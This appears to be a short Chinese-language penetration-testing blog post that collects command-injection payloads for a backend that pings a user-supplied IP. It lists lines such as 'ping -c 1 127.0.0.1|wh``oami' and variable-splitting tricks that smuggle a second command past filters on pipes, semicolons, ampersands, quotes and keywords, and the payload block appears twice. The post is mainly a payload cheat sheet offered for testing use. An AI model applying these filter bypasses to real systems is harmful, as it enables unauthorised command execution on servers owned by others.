命令执行常用命令
2018-05-28 13:23
204 查看
在***测试过程中,会遇见一些关于命令执行的漏洞,下面是收集的一些常用命令:
假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1
没有任何防护
过滤了|
过滤了 ; |
过滤了 ; | &
过滤了 whoami关键字
ping -c 1 127.0.0.1|wh``oami
过滤了whoami ``
ping -c 1 127.0.0.1|wh''oami
过滤了whoami `` ''
ping -c 1 127.0.0.1;a=who;b=ami;$a$b
过滤了whoami `` '' $
ping -c 1 127.0.0.1|whoam""i
过滤了whoami `` '' $ "" ;
ping -c 1 127.0.0.1|whoam\i
; < > <> | || & && `` () ' '
假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1
没有任何防护
过滤了|
过滤了 ; |
过滤了 ; | &
过滤了 whoami关键字
ping -c 1 127.0.0.1|wh``oami
过滤了whoami ``
ping -c 1 127.0.0.1|wh''oami
过滤了whoami `` ''
ping -c 1 127.0.0.1;a=who;b=ami;$a$b
过滤了whoami `` '' $
ping -c 1 127.0.0.1|whoam""i
过滤了whoami `` '' $ "" ;
ping -c 1 127.0.0.1|whoam\i
相关文章推荐
- linux中执行shell命令的几种常用方法
- salt常用命令、模块、执行
- oracle数据库执行脚本常用命令总结
- LInux脚本执行一些常用命令
- PHP执行linux系统命令的常用函数使用说明
- SIMCOM300模块常用AT命令列表----带命令执行示例
- Oracle导入SQL脚本执行和常用命令大全
- vscode 如何生成golang的可执行程序?--go build常用命令
- linux常用命令(六)命令执行顺序控制与管道
- 实例学习ansible系列(3)Ansible执行命令常用Option
- sql*plus 常用命令(登陆、连接、执行等)
- python常用内置模块,执行系统命令的模块
- saltstack的常用操作(三) 命令与模块的执行
- Linux命令行执行.sql文件及常用sql命令
- Gauge中执行测试的常用命令
- pom.xml文件所在的目录下可以执行各种Maven命令,常用的有如下几种
- web测试常用python代码——ssh远程登陆以及命令执行
- linux常用命令:radhat6.0下netstat -nap的执行结果
- PHP执行Linux命令常用的6个函数
- web测试常用python代码——ssh远程登陆以及命令执行